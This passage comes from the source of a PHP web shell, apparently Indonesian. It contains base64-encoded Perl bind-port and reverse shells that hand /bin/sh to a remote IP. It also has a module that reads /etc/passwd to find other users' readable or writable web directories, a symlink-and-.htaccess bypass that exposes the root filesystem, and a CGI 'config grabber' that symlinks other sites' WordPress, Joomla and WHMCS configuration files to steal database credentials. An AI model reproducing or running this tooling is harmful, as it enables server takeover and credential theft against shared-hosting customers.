- }
- }
- }
- } else {
- echo "<br>";
- }
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- }
- echo "</div>";
- }elseif($_GET['kntd'] == 'network') {
- echo "<form method='post'>
- <u>Bind Port:</u> <br>
- PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
- <input type='submit' name='sub_bp' value='>>'>
- </form>
- <form method='post'>
- <u>Back Connect:</u> <br>
- Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
- PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
- <input type='submit' name='sub_bc' value='>>'>
- </form>";
- $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
- if(isset($_POST['sub_bp'])) {
- $f_bp = fopen("/tmp/bp.pl", "w");
- fwrite($f_bp, base64_decode($bind_port_p));
- fclose($f_bp);
- $port = $_POST['port_bind'];
- $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
- sleep(1);
- echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
- unlink("/tmp/bp.pl");
- }
- $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
- if(isset($_POST['sub_bc'])) {
- $f_bc = fopen("/tmp/bc.pl", "w");
- fwrite($f_bc, base64_decode($bind_connect_p));
- fclose($f_bc);
- $ipbc = $_POST['ip_bc'];
- $port = $_POST['port_bc'];
- $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
- sleep(1);
- echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
- unlink("/tmp/bc.pl");
- }
- }elseif($_GET['kntd'] == 'jumping') {
- $i = 0;
- echo "<div class='margin: 5px auto;'>";
- if(preg_match("/hsphere/", $dir)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $url = str_replace(array("http://","www."), "", strtolower($url));
- $etc = "/etc/passwd";
- $f = fopen($etc,"r");
- while($gets = fgets($f)) {
- $pecah = explode(":", $gets);
- $user = $pecah[0];
- $dir_user = "/hsphere/local/home/$user";
- if(is_dir($dir_user) === true) {
- $url_user = $dir_user."/".$url;
- if(is_readable($url_user)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
- if(is_writable($url_user)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" style="width: 500px; height: 250px;">';
- $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
- while($getss = fgets($fp)) {
- echo $getss;
- }
- echo '</textarea><br>
- <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
- </form></center>';
- }
- } elseif(preg_match("/vhosts/", $dir)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $web_vh = "/var/www/vhosts/$url/httpdocs";
- if(is_dir($web_vh) === true) {
- if(is_readable($web_vh)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
- if(is_writable($web_vh)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" style="width: 500px; height: 250px;">';
- bing("ip:$ip");
- echo '</textarea><br>
- <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
- </form></center>';
- }
- } else {
- echo "<pre>";
- $etc = fopen("/etc/passwd", "r") or die("<font color=lime>Can't read /etc/passwd</font>");
- while($passwd = fgets($etc)) {
- if($passwd == '' || !$etc) {
- echo "<font color=lime>Can't read /etc/passwd</font>";
- } else {
- preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
- foreach($user_jumping[1] as $myuser_jump) {
- $user_jumping_dir = "/home/$myuser_jump/public_html";
- if(is_readable($user_jumping_dir)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
- if(is_writable($user_jumping_dir)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
- }
- echo $jrw;
- if(function_exists('posix_getpwuid')) {
- $domain_jump = file_get_contents("/etc/named.conf");
- if($domain_jump == '') {
- echo " => ( <font color=lime>gabisa ambil nama domain nya</font> )<br>";
- } else {
- preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
- foreach($domains_jump[1] as $dj) {
- $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
- $user_jumping_url = $user_jumping_url['name'];
- if($user_jumping_url == $myuser_jump) {
- echo " => ( <u>$dj</u> )<br>";
- break;
- }
- }
- }
- } else {
- echo "<br>";
- }
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- }
- echo "</div>";
- }elseif($_GET['kntd'] == 'vhost') {
- echo "<form method='POST' action=''>";
- echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
- echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
- if (isset($_POST['Colii'])){ system('ln -s / Rintoar.txt');
- $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
- $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
- $rt="<br><a href=Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
- Bypassed Successfully</b></font></a>";
- echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
- }elseif($_GET['kntd'] == 'vhostgrab') {
- ?>
- <form method="post">
- <input type="submit" name="vhostgrab" value="Vhost Config Grabber">
- </form>
- <?php
- if (isset($_POST['vhostgrab']))
- {
- @mkdir('noname_vhost', 0755);
- @chdir('noname_vhost');
- $elesem = ".htaccess";
- $elakab = "$elesem";
- $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
- $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
- AddType application/x-httpd-cgi .cin
- AddHandler cgi-script .cin
- AddHandler cgi-script .cin";
- fwrite ( $filhat , $htcont ) ;
- fclose ($filhat);
- $xaivhost = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxubiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT4uOlByaXY4IHZob3N0cyBDb25maWcgR3JhYmJlciB2MC4xOi48L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCi5uZXdTdHlsZTEgew0KIGZvbnQtZmFtaWx5OiB1YnVudHU7DQogZm9udC1zaXplOiB4LWxhcmdlOw0KIGNvbG9yOiB3aGl0ZTsNCiBiYWNrZ3JvdW5kLWNvbG9yOiBibGFjazsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCg0KDQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPi46IENvZGVkIGJ5IEZhbGxhZyBHYXNzcmluaSBSZWNvZGVkIEJ5IGVYZVVzZXIgOi48L3A+DQo8cD5rcmVvbnJpbnRvQGdtYWlsLmNvbTwvcD4NCjxwPmh0dHA6Ly9mYi5jb20vcmludG8yMjM0PC9wPic7DQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTs